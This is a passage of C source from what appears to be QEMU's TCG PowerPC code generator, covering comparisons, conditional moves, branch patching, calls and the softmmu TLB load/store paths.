TCG_TYPE_V64: tcg_debug_assert(arg >= TCG_REG_V0); if (have_vsx) { tcg_out_mem_long(s, have_isa_3_00 ? STXSD : 0, STXSDX, arg, base, offset); break; } tcg_debug_assert((offset & 7) == 0); if (offset & 8) { tcg_out_vsldoi(s, TCG_VEC_TMP1, arg, arg, 8); arg = TCG_VEC_TMP1; } tcg_out_mem_long(s, 0, STVEWX, arg, base, offset); tcg_out_mem_long(s, 0, STVEWX, arg, base, offset + 4); break; case TCG_TYPE_V128: tcg_debug_assert(arg >= TCG_REG_V0); tcg_out_mem_long(s, have_isa_3_00 ? STXV : 0, STVX, arg, base, offset); break; default: g_assert_not_reached(); } } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } static void tcg_out_cmp(TCGContext *s, int cond, TCGArg arg1, TCGArg arg2, int const_arg2, int cr, TCGType type) { int imm; uint32_t op; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); /* Simplify the comparisons below wrt CMPI. */ if (type == TCG_TYPE_I32) { arg2 = (int32_t)arg2; } switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: if (const_arg2) { if ((int16_t) arg2 == arg2) { op = CMPI; imm = 1; break; } else if ((uint16_t) arg2 == arg2) { op = CMPLI; imm = 1; break; } } op = CMPL; imm = 0; break; case TCG_COND_LT: case TCG_COND_GE: case TCG_COND_LE: case TCG_COND_GT: if (const_arg2) { if ((int16_t) arg2 == arg2) { op = CMPI; imm = 1; break; } } op = CMP; imm = 0; break; case TCG_COND_LTU: case TCG_COND_GEU: case TCG_COND_LEU: case TCG_COND_GTU: if (const_arg2) { if ((uint16_t) arg2 == arg2) { op = CMPLI; imm = 1; break; } } op = CMPL; imm = 0; break; default: tcg_abort(); } op |= BF(cr) | ((type == TCG_TYPE_I64) << 21); if (imm) { tcg_out32(s, op | RA(arg1) | (arg2 & 0xffff)); } else { if (const_arg2) { tcg_out_movi(s, type, TCG_REG_R0, arg2); arg2 = TCG_REG_R0; } tcg_out32(s, op | RA(arg1) | RB(arg2)); } } static void tcg_out_setcond_eq0(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) { if (type == TCG_TYPE_I32) { tcg_out32(s, CNTLZW | RS(src) | RA(dst)); tcg_out_shri32(s, dst, dst, 5); } else { tcg_out32(s, CNTLZD | RS(src) | RA(dst)); tcg_out_shri64(s, dst, dst, 6); } } static void tcg_out_setcond_ne0(TCGContext *s, TCGReg dst, TCGReg src) { /* X != 0 implies X + -1 generates a carry. Extra addition trickery means: R = X-1 + ~X + C = X-1 + (-X+1) + C = C. */ if (dst != src) { tcg_out32(s, ADDIC | TAI(dst, src, -1)); tcg_out32(s, SUBFE | TAB(dst, dst, src)); } else { tcg_out32(s, ADDIC | TAI(TCG_REG_R0, src, -1)); tcg_out32(s, SUBFE | TAB(dst, TCG_REG_R0, src)); } } static TCGReg tcg_gen_setcond_xor(TCGContext *s, TCGReg arg1, TCGArg arg2, bool const_arg2) { if (const_arg2) { if ((uint32_t)arg2 == arg2) { tcg_out_xori32(s, TCG_REG_R0, arg1, arg2); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, arg2); tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, TCG_REG_R0)); } } else { tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, arg2)); } return TCG_REG_R0; } static void tcg_out_setcond(TCGContext *s, TCGType type, TCGCond cond, TCGArg arg0, TCGArg arg1, TCGArg arg2, int const_arg2) { int crop, sh; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); /* Ignore high bits of a potential constant arg2. */ if (type == TCG_TYPE_I32) { arg2 = (uint32_t)arg2; } /* Handle common and trivial cases before handling anything else. */ if (arg2 == 0) { switch (cond) { case TCG_COND_EQ: tcg_out_setcond_eq0(s, type, arg0, arg1); return; case TCG_COND_NE: if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { tcg_out_ext32u(s, TCG_REG_R0, arg1); arg1 = TCG_REG_R0; } tcg_out_setcond_ne0(s, arg0, arg1); return; case TCG_COND_GE: tcg_out32(s, NOR | SAB(arg1, arg0, arg1)); arg1 = arg0; /* FALLTHRU */ case TCG_COND_LT: /* Extract the sign bit. */ if (type == TCG_TYPE_I32) { tcg_out_shri32(s, arg0, arg1, 31); } else { tcg_out_shri64(s, arg0, arg1, 63); } return; default: break; } } /* If we have ISEL, we can implement everything with 3 or 4 insns. All other cases below are also at least 3 insns, so speed up the code generator by not considering them and always using ISEL. */ if (have_isel) { int isel, tab; tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); isel = tcg_to_isel[cond]; tcg_out_movi(s, type, arg0, 1); if (isel & 1) { /* arg0 = (bc ? 0 : 1) */ tab = TAB(arg0, 0, arg0); isel &= ~1; } else { /* arg0 = (bc ? 1 : 0) */ tcg_out_movi(s, type, TCG_REG_R0, 0); tab = TAB(arg0, arg0, TCG_REG_R0); } tcg_out32(s, isel | tab); return; } switch (cond) { case TCG_COND_EQ: arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); tcg_out_setcond_eq0(s, type, arg0, arg1); return; case TCG_COND_NE: arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); /* Discard the high bits only once, rather than both inputs. */ if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { tcg_out_ext32u(s, TCG_REG_R0, arg1); arg1 = TCG_REG_R0; } tcg_out_setcond_ne0(s, arg0, arg1); return; case TCG_COND_GT: case TCG_COND_GTU: sh = 30; crop = 0; goto crtest; case TCG_COND_LT: case TCG_COND_LTU: sh = 29; crop = 0; goto crtest; case TCG_COND_GE: case TCG_COND_GEU: sh = 31; crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_LT) | BB(7, CR_LT); goto crtest; case TCG_COND_LE: case TCG_COND_LEU: sh = 31; crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_GT) | BB(7, CR_GT); crtest: tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); if (crop) { tcg_out32(s, crop); } tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); tcg_out_rlw(s, RLWINM, arg0, TCG_REG_R0, sh, 31, 31); break; default: tcg_abort(); } } static void tcg_out_bc(TCGContext *s, int bc, TCGLabel *l) { if (l->has_value) { bc |= reloc_pc14_val(s->code_ptr, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_PPC_REL14, l, 0); } tcg_out32(s, bc); } static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *l, TCGType type) { tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); tcg_out_bc(s, tcg_to_bc[cond], l); } static void tcg_out_movcond(TCGContext *s, TCGType type, TCGCond cond, TCGArg dest, TCGArg c1, TCGArg c2, TCGArg v1, TCGArg v2, bool const_c2) { /* If for some reason both inputs are zero, don't produce bad code. */ if (v1 == 0 && v2 == 0) { tcg_out_movi(s, type, dest, 0); return; } tcg_out_cmp(s, cond, c1, c2, const_c2, 7, type); if (have_isel) { int isel = tcg_to_isel[cond]; /* Swap the V operands if the operation indicates inversion. */ if (isel & 1) { int t = v1; v1 = v2; v2 = t; isel &= ~1; } /* V1 == 0 is handled by isel; V2 == 0 must be handled by hand. */ if (v2 == 0) { tcg_out_movi(s, type, TCG_REG_R0, 0); } tcg_out32(s, isel | TAB(dest, v1, v2)); } else { if (dest == v2) { cond = tcg_invert_cond(cond); v2 = v1; } else if (dest != v1) { if (v1 == 0) { tcg_out_movi(s, type, dest, 0); } else { tcg_out_mov(s, type, dest, v1); } } /* Branch forward over one insn */ tcg_out32(s, tcg_to_bc[cond] | 8); if (v2 == 0) { tcg_out_movi(s, type, dest, 0); } else { tcg_out_mov(s, type, dest, v2); } } } static void tcg_out_cntxz(TCGContext *s, TCGType type, uint32_t opc, TCGArg a0, TCGArg a1, TCGArg a2, bool const_a2) { if (const_a2 && a2 == (type == TCG_TYPE_I32 ? 32 : 64)) { tcg_out32(s, opc | RA(a0) | RS(a1)); } else { tcg_out_cmp(s, TCG_COND_EQ, a1, 0, 1, 7, type); /* Note that the only other valid constant for a2 is 0. */ if (have_isel) { tcg_out32(s, opc | RA(TCG_REG_R0) | RS(a1)); tcg_out32(s, tcg_to_isel[TCG_COND_EQ] | TAB(a0, a2, TCG_REG_R0)); } else if (!const_a2 && a0 == a2) { tcg_out32(s, tcg_to_bc[TCG_COND_EQ] | 8); tcg_out32(s, opc | RA(a0) | RS(a1)); } else { tcg_out32(s, opc | RA(a0) | RS(a1)); tcg_out32(s, tcg_to_bc[TCG_COND_NE] | 8); if (const_a2) { tcg_out_movi(s, type, a0, 0); } else { tcg_out_mov(s, type, a0, a2); } } } } static void tcg_out_cmp2(TCGContext *s, const TCGArg *args, const int *const_args) { static const struct { uint8_t bit1, bit2; } bits[] = { [TCG_COND_LT ] = { CR_LT, CR_LT }, [TCG_COND_LE ] = { CR_LT, CR_GT }, [TCG_COND_GT ] = { CR_GT, CR_GT }, [TCG_COND_GE ] = { CR_GT, CR_LT }, [TCG_COND_LTU] = { CR_LT, CR_LT }, [TCG_COND_LEU] = { CR_LT, CR_GT }, [TCG_COND_GTU] = { CR_GT, CR_GT }, [TCG_COND_GEU] = { CR_GT, CR_LT }, }; TCGCond cond = args[4], cond2; TCGArg al, ah, bl, bh; int blconst, bhconst; int op, bit1, bit2; al = args[0]; ah = args[1]; bl = args[2]; bh = args[3]; blconst = const_args[2]; bhconst = const_args[3]; switch (cond) { case TCG_COND_EQ: op = CRAND; goto do_equality; case TCG_COND_NE: op = CRNAND; do_equality: tcg_out_cmp(s, cond, al, bl, blconst, 6, TCG_TYPE_I32); tcg_out_cmp(s, cond, ah, bh, bhconst, 7, TCG_TYPE_I32); tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); break; case TCG_COND_LT: case TCG_COND_LE: case TCG_COND_GT: case TCG_COND_GE: case TCG_COND_LTU: case TCG_COND_LEU: case TCG_COND_GTU: case TCG_COND_GEU: bit1 = bits[cond].bit1; bit2 = bits[cond].bit2; op = (bit1 != bit2 ? CRANDC : CRAND); cond2 = tcg_unsigned_cond(cond); tcg_out_cmp(s, cond, ah, bh, bhconst, 6, TCG_TYPE_I32); tcg_out_cmp(s, cond2, al, bl, blconst, 7, TCG_TYPE_I32); tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, bit2)); tcg_out32(s, CROR | BT(7, CR_EQ) | BA(6, bit1) | BB(7, CR_EQ)); break; default: tcg_abort(); } } static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, const int *const_args) { tcg_out_cmp2(s, args + 1, const_args + 1); tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); tcg_out_rlw(s, RLWINM, args[0], TCG_REG_R0, 31, 31, 31); } static void tcg_out_brcond2 (TCGContext *s, const TCGArg *args, const int *const_args) { tcg_out_cmp2(s, args, const_args); tcg_out_bc(s, BC | BI(7, CR_EQ) | BO_COND_TRUE, arg_label(args[5])); } static void tcg_out_mb(TCGContext *s, TCGArg a0) { uint32_t insn = HWSYNC; a0 &= TCG_MO_ALL; if (a0 == TCG_MO_LD_LD) { insn = LWSYNC; } else if (a0 == TCG_MO_ST_ST) { insn = EIEIO; } tcg_out32(s, insn); } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { if (TCG_TARGET_REG_BITS == 64) { tcg_insn_unit i1, i2; intptr_t tb_diff = addr - tc_ptr; intptr_t br_diff = addr - (jmp_addr + 4); uint64_t pair; /* This does not exercise the range of the branch, but we do still need to be able to load the new value of TCG_REG_TB. But this does still happen quite often. */ if (tb_diff == (int16_t)tb_diff) { i1 = ADDI | TAI(TCG_REG_TB, TCG_REG_TB, tb_diff); i2 = B | (br_diff & 0x3fffffc); } else { intptr_t lo = (int16_t)tb_diff; intptr_t hi = (int32_t)(tb_diff - lo); assert(tb_diff == hi + lo); i1 = ADDIS | TAI(TCG_REG_TB, TCG_REG_TB, hi >> 16); i2 = ADDI | TAI(TCG_REG_TB, TCG_REG_TB, lo); } #ifdef HOST_WORDS_BIGENDIAN pair = (uint64_t)i1 << 32 | i2; #else pair = (uint64_t)i2 << 32 | i1; #endif /* As per the enclosing if, this is ppc64. Avoid the _Static_assert within atomic_set that would fail to build a ppc32 host. */ atomic_set__nocheck((uint64_t *)jmp_addr, pair); flush_icache_range(jmp_addr, jmp_addr + 8); } else { intptr_t diff = addr - jmp_addr; tcg_debug_assert(in_range_b(diff)); atomic_set((uint32_t *)jmp_addr, B | (diff & 0x3fffffc)); flush_icache_range(jmp_addr, jmp_addr + 4); } } static void tcg_out_call(TCGContext *s, tcg_insn_unit *target) { #ifdef _CALL_AIX /* Look through the descriptor. If the branch is in range, and we don't have to spend too much effort on building the toc. */ void *tgt = ((void **)target)[0]; uintptr_t toc = ((uintptr_t *)target)[1]; intptr_t diff = tcg_pcrel_diff(s, tgt); if (in_range_b(diff) && toc == (uint32_t)toc) { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, toc); tcg_out_b(s, LK, tgt); } else { /* Fold the low bits of the constant into the addresses below. */ intptr_t arg = (intptr_t)target; int ofs = (int16_t)arg; if (ofs + 8 < 0x8000) { arg -= ofs; } else { ofs = 0; } tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_TMP1, arg); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R0, TCG_REG_TMP1, ofs); tcg_out32(s, MTSPR | RA(TCG_REG_R0) | CTR); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R2, TCG_REG_TMP1, ofs + SZP); tcg_out32(s, BCCTR | BO_ALWAYS | LK); } #elif defined(_CALL_ELF) && _CALL_ELF == 2 intptr_t diff; /* In the ELFv2 ABI, we have to set up r12 to contain the destination address, which the callee uses to compute its TOC address. */ /* FIXME: when the branch is in range, we could avoid r12 load if we knew that the destination uses the same TOC, and what its local entry point offset is. */ tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R12, (intptr_t)target); diff = tcg_pcrel_diff(s, target); if (in_range_b(diff)) { tcg_out_b(s, LK, target); } else { tcg_out32(s, MTSPR | RS(TCG_REG_R12) | CTR); tcg_out32(s, BCCTR | BO_ALWAYS | LK); } #else tcg_out_b(s, LK, target); #endif } static const uint32_t qemu_ldx_opc[16] = { [MO_UB] = LBZX, [MO_UW] = LHZX, [MO_UL] = LWZX, [MO_Q] = LDX, [MO_SW] = LHAX, [MO_SL] = LWAX, [MO_BSWAP | MO_UB] = LBZX, [MO_BSWAP | MO_UW] = LHBRX, [MO_BSWAP | MO_UL] = LWBRX, [MO_BSWAP | MO_Q] = LDBRX, }; static const uint32_t qemu_stx_opc[16] = { [MO_UB] = STBX, [MO_UW] = STHX, [MO_UL] = STWX, [MO_Q] = STDX, [MO_BSWAP | MO_UB] = STBX, [MO_BSWAP | MO_UW] = STHBRX, [MO_BSWAP | MO_UL] = STWBRX, [MO_BSWAP | MO_Q] = STDBRX, }; static const uint32_t qemu_exts_opc[4] = { EXTSB, EXTSH, EXTSW, 0 }; #if defined (CONFIG_SOFTMMU) #include "../tcg-ldst.inc.c" /* helper signature: helper_ld_mmu(CPUState *env, target_ulong addr, * int mmu_idx, uintptr_t ra) */ static void * const qemu_ld_helpers[16] = { [MO_UB] = helper_ret_ldub_mmu, [MO_LEUW] = helper_le_lduw_mmu, [MO_LEUL] = helper_le_ldul_mmu, [MO_LEQ] = helper_le_ldq_mmu, [MO_BEUW] = helper_be_lduw_mmu, [MO_BEUL] = helper_be_ldul_mmu, [MO_BEQ] = helper_be_ldq_mmu, }; /* helper signature: helper_st_mmu(CPUState *env, target_ulong addr, * uintxx_t val, int mmu_idx, uintptr_t ra) */ static void * const qemu_st_helpers[16] = { [MO_UB] = helper_ret_stb_mmu, [MO_LEUW] = helper_le_stw_mmu, [MO_LEUL] = helper_le_stl_mmu, [MO_LEQ] = helper_le_stq_mmu, [MO_BEUW] = helper_be_stw_mmu, [MO_BEUL] = helper_be_stl_mmu, [MO_BEQ] = helper_be_stq_mmu, }; /* We expect to use a 16-bit negative offset from ENV. */ QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) > 0); QEMU_BUILD_BUG_ON(TLB_MASK_TABLE_OFS(0) < -32768); /* Perform the TLB load and compare. Places the result of the comparison in CR7, loads the addend of the TLB into R3, and returns the register containing the guest address (zero-extended into R4). Clobbers R0 and R2. */ static TCGReg tcg_out_tlb_read(TCGContext *s, MemOp opc, TCGReg addrlo, TCGReg addrhi, int mem_index, bool is_read) { #ifdef TARGET_ARM struct uc_struct *uc = s->uc; #endif int cmp_off = (is_read ? offsetof(CPUTLBEntry, addr_read) : offsetof(CPUTLBEntry, addr_write)); int fast_off = TLB_MASK_TABLE_OFS(mem_index); int mask_off = fast_off + offsetof(CPUTLBDescFast, mask); int table_off = fast_off + offsetof(CPUTLBDescFast, table); unsigned s_bits = opc & MO_SIZE; unsigned a_bits = get_alignment_bits(opc); /* Load tlb_mask[mmu_idx] and tlb_table[mmu_idx]. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_AREG0, mask_off); tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R4, TCG_AREG0, table_off); /* Extract the page index, shifted into place for tlb index. */ if (TCG_TARGET_REG_BITS == 32) { tcg_out_shri32(s, TCG_REG_TMP1, addrlo, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); } else { tcg_out_shri64(s, TCG_REG_TMP1, addrlo, TARGET_PAGE_BITS - CPU_TLB_ENTRY_BITS); } tcg_out32(s, AND | SAB(TCG_REG_R3, TCG_REG_R3, TCG_REG_TMP1)); /* Load the TLB comparator. */ if (cmp_off == 0 && TCG_TARGET_REG_BITS >= TARGET_LONG_BITS) { uint32_t lxu = (TCG_TARGET_REG_BITS == 32 || TARGET_LONG_BITS == 32 ? LWZUX : LDUX); tcg_out32(s, lxu | TAB(TCG_REG_TMP1, TCG_REG_R3, TCG_REG_R4)); } else { tcg_out32(s, ADD | TAB(TCG_REG_R3, TCG_REG_R3, TCG_REG_R4)); if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_TMP1, TCG_REG_R3, cmp_off + 4); tcg_out_ld(s, TCG_TYPE_I32, TCG_REG_R4, TCG_REG_R3, cmp_off); } else { tcg_out_ld(s, TCG_TYPE_TL, TCG_REG_TMP1, TCG_REG_R3, cmp_off); } } /* Load the TLB addend for use on the fast path. Do this asap to minimize any load use delay. */ tcg_out_ld(s, TCG_TYPE_PTR, TCG_REG_R3, TCG_REG_R3, offsetof(CPUTLBEntry, addend)); /* Clear the non-page, non-alignment bits from the address */ if (TCG_TARGET_REG_BITS == 32) { /* We don't support unaligned accesses on 32-bits. * Preserve the bottom bits and thus trigger a comparison * failure on unaligned accesses. */ if (a_bits < s_bits) { a_bits = s_bits; } tcg_out_rlw(s, RLWINM, TCG_REG_R0, addrlo, 0, (32 - a_bits) & 31, 31 - TARGET_PAGE_BITS); } else { TCGReg t = addrlo; /* If the access is unaligned, we need to make sure we fail if we * cross a page boundary. The trick is to add the access size-1 * to the address before masking the low bits. That will make the * address overflow to the next page if we cross a page boundary, * which will then force a mismatch of the TLB compare. */ if (a_bits < s_bits) { unsigned a_mask = (1 << a_bits) - 1; unsigned s_mask = (1 << s_bits) - 1; tcg_out32(s, ADDI | TAI(TCG_REG_R0, t, s_mask - a_mask)); t = TCG_REG_R0; } /* Mask the address for the requested alignment. */ if (TARGET_LONG_BITS == 32) { tcg_out_rlw(s, RLWINM, TCG_REG_R0, t, 0, (32 - a_bits) & 31, 31 - TARGET_PAGE_BITS); /* Zero-extend the address for use in the final address. */ tcg_out_ext32u(s, TCG_REG_R4, addrlo); addrlo = TCG_REG_R4; } else if (a_bits == 0) { tcg_out_rld(s, RLDICR, TCG_REG_R0, t, 0, 63 - TARGET_PAGE_BITS); } else { tcg_out_rld(s, RLDICL, TCG_REG_R0, t, 64 - TARGET_PAGE_BITS, TARGET_PAGE_BITS - a_bits); tcg_out_rld(s, RLDICL, TCG_REG_R0, TCG_REG_R0, TARGET_PAGE_BITS, 0); } } if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, 0, 7, TCG_TYPE_I32); tcg_out_cmp(s, TCG_COND_EQ, addrhi, TCG_REG_R4, 0, 6, TCG_TYPE_I32); tcg_out32(s, CRAND | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); } else { tcg_out_cmp(s, TCG_COND_EQ, TCG_REG_R0, TCG_REG_TMP1, 0, 7, TCG_TYPE_TL); } return addrlo; } /* Record the context of a call to the out of line helper code for the slow path for a load or store, so that we can later generate the correct helper code. */ static void add_qemu_ldst_label(TCGContext *s, bool is_ld, TCGMemOpIdx oi, TCGReg datalo_reg, TCGReg datahi_reg, TCGReg addrlo_reg, TCGReg addrhi_reg, tcg_insn_unit *raddr, tcg_insn_unit *lptr) { TCGLabelQemuLdst *label = new_ldst_label(s); label->is_ld = is_ld; label->oi = oi; label->datalo_reg = datalo_reg; label->datahi_reg = datahi_reg; label->addrlo_reg = addrlo_reg; label->addrhi_reg = addrhi_reg; label->raddr = raddr; label->label_ptr[0] = lptr; } static bool tcg_out_qemu_ld_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); TCGReg hi, lo, arg = TCG_REG_R3; if (!reloc_pc14(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); lo = lb->addrlo_reg; hi = lb->addrhi_reg; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); } else { /* If the address needed to be zero-extended, we'll have already placed it in R4. The only remaining case is 64-bit guest. */ tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); } tcg_out_movi(s, TCG_TYPE_I32, arg++, oi); tcg_out32(s, MFSPR | RT(arg) | LR); tcg_out_call(s, qemu_ld_helpers[opc & (MO_BSWAP | MO_SIZE)]); lo = lb->datalo_reg; hi = lb->datahi_reg; if (TCG_TARGET_REG_BITS == 32 && (opc & MO_SIZE) == MO_64) { tcg_out_mov(s, TCG_TYPE_I32, lo, TCG_REG_R4); tcg_out_mov(s, TCG_TYPE_I32, hi, TCG_REG_R3); } else if (opc & MO_SIGN) { uint32_t insn = qemu_exts_opc[opc & MO_SIZE]; tcg_out32(s, insn | RA(lo) | RS(TCG_REG_R3)); } else { tcg_out_mov(s, TCG_TYPE_REG, lo, TCG_REG_R3); } tcg_out_b(s, 0, lb->raddr); return true; } static bool tcg_out_qemu_st_slow_path(TCGContext *s, TCGLabelQemuLdst *lb) { TCGMemOpIdx oi = lb->oi; MemOp opc = get_memop(oi); MemOp s_bits = opc & MO_SIZE; TCGReg hi, lo, arg = TCG_REG_R3; if (!reloc_pc14(lb->label_ptr[0], s->code_ptr)) { return false; } tcg_out_mov(s, TCG_TYPE_PTR, arg++, TCG_AREG0); lo = lb->addrlo_reg; hi = lb->addrhi_reg; if (TCG_TARGET_REG_BITS < TARGET_LONG_BITS) { #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); } else { /* If the address needed to be zero-extended, we'll have already placed it in R4. The only remaining case is 64-bit guest. */ tcg_out_mov(s, TCG_TYPE_TL, arg++, lo); } lo = lb->datalo_reg; hi = lb->datahi_reg; if (TCG_TARGET_REG_BITS == 32) { switch (s_bits) { case MO_64: #ifdef TCG_TARGET_CALL_ALIGN_ARGS arg |= 1; #endif tcg_out_mov(s, TCG_TYPE_I32, arg++, hi); /* FALLTHRU */ case MO_32: tcg_out_mov(s, TCG_TYPE_I32, arg++, lo); break; default: tcg_out_rlw(s, RLWINM, arg++, lo, 0, 32 - (8 << s_bits), 31); break; } } else { if (s_bits == MO_64) { tcg_out_mov(s, TCG_TYPE_I64, arg++, lo); } else { tcg_out_rld(s, RLDICL, arg++, lo, 0, 64 - (8 << s_bits)); } } tcg_out_movi(s, TCG_TYPE_I32, arg++, oi); tcg_out32(s, MFSPR | RT(arg) | LR); tcg_out_call(s, qemu_st_helpers[opc & (MO_BSWAP | MO_SIZE)]); tcg_out_b(s, 0, lb->raddr); return true; } #endif /* SOFTMMU */ static void tcg_out_qemu_ld(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg datalo, datahi, addrlo, rbase; TCGReg addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc, s_bits; #ifdef CONFIG_SOFTMMU int mem_index; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addrlo = *args++; addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); s_bits = opc & MO_SIZE; #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addrlo = tcg_out_tlb_read(s, opc, addrlo, addrhi, mem_index, true); /* Load a pointer into the current opcode w/conditional branch-link. */ label_ptr = s->code_ptr; tcg_out32(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); rbase = TCG_REG_R3; #else /* !CONFIG_SOFTMMU */ rbase = guest_base ? TCG_GUEST_BASE_REG : 0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); addrlo = TCG_REG_TMP1; } #endif if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { if (opc & MO_BSWAP) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); tcg_out32(s, LWBRX | TAB(datahi, rbase, TCG_REG_R0)); } else if (rbase != 0) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWZX | TAB(datahi, rbase, addrlo)); tcg_out32(s, LWZX | TAB(datalo, rbase, TCG_REG_R0)); } else if (addrlo == datahi) { tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); } else { tcg_out32(s, LWZ | TAI(datahi, addrlo, 0)); tcg_out32(s, LWZ | TAI(datalo, addrlo, 4)); } } else { uint32_t insn = qemu_ldx_opc[opc & (MO_BSWAP | MO_SSIZE)]; if (!have_isa_2_06 && insn == LDBRX) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, LWBRX | TAB(datalo, rbase, addrlo)); tcg_out32(s, LWBRX | TAB(TCG_REG_R0, rbase, TCG_REG_R0)); tcg_out_rld(s, RLDIMI, datalo, TCG_REG_R0, 32, 0); } else if (insn) { tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); } else { insn = qemu_ldx_opc[opc & (MO_SIZE | MO_BSWAP)]; tcg_out32(s, insn | TAB(datalo, rbase, addrlo)); insn = qemu_exts_opc[s_bits]; tcg_out32(s, insn | RA(datalo) | RS(datalo)); } } #ifdef CONFIG_SOFTMMU add_qemu_ldst_label(s, true, oi, datalo, datahi, addrlo, addrhi, s->code_ptr, label_ptr); #endif } static void tcg_out_qemu_st(TCGContext *s, const TCGArg *args, bool is_64) { TCGReg datalo, datahi, addrlo, rbase; TCGReg addrhi __attribute__((unused)); TCGMemOpIdx oi; MemOp opc, s_bits; #ifdef CONFIG_SOFTMMU int mem_index; tcg_insn_unit *label_ptr; #endif datalo = *args++; datahi = (TCG_TARGET_REG_BITS == 32 && is_64 ? *args++ : 0); addrlo = *args++; addrhi = (TCG_TARGET_REG_BITS < TARGET_LONG_BITS ? *args++ : 0); oi = *args++; opc = get_memop(oi); s_bits = opc & MO_SIZE; #ifdef CONFIG_SOFTMMU mem_index = get_mmuidx(oi); addrlo = tcg_out_tlb_read(s, opc, addrlo, addrhi, mem_index, false); /* Load a pointer into the current opcode w/conditional branch-link. */ label_ptr = s->code_ptr; tcg_out32(s, BC | BI(7, CR_EQ) | BO_COND_FALSE | LK); rbase = TCG_REG_R3; #else /* !CONFIG_SOFTMMU */ rbase = guest_base ? TCG_GUEST_BASE_REG : 0; if (TCG_TARGET_REG_BITS > TARGET_LONG_BITS) { tcg_out_ext32u(s, TCG_REG_TMP1, addrlo); addrlo = TCG_REG_TMP1; } #endif if (TCG_TARGET_REG_BITS == 32 && s_bits == MO_64) { if (opc & MO_BSWAP) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, STWBRX | SAB(datalo, rbase, addrlo)); tcg_out32(s, STWBRX | SAB(datahi, rbase, TCG_REG_R0)); } else if (rbase != 0) { tcg_out32(s, ADDI | TAI(TCG_REG_R0, addrlo, 4)); tcg_out32(s, STWX | SAB(datahi, rbase, addrlo)); tcg_out32(s, STWX | SAB(datalo, rbase, TCG_REG_R0)); } else { tcg_out32(s, STW | TAI(datahi, addrlo, 0)); tcg_out32(s, STW | TAI(datalo, addrlo, 4)); } } else { uint32_t insn = qemu_stx_opc[opc & (MO_BSWAP | MO_SIZE)]; if (!have_isa_2_06 && insn == STDBRX) { 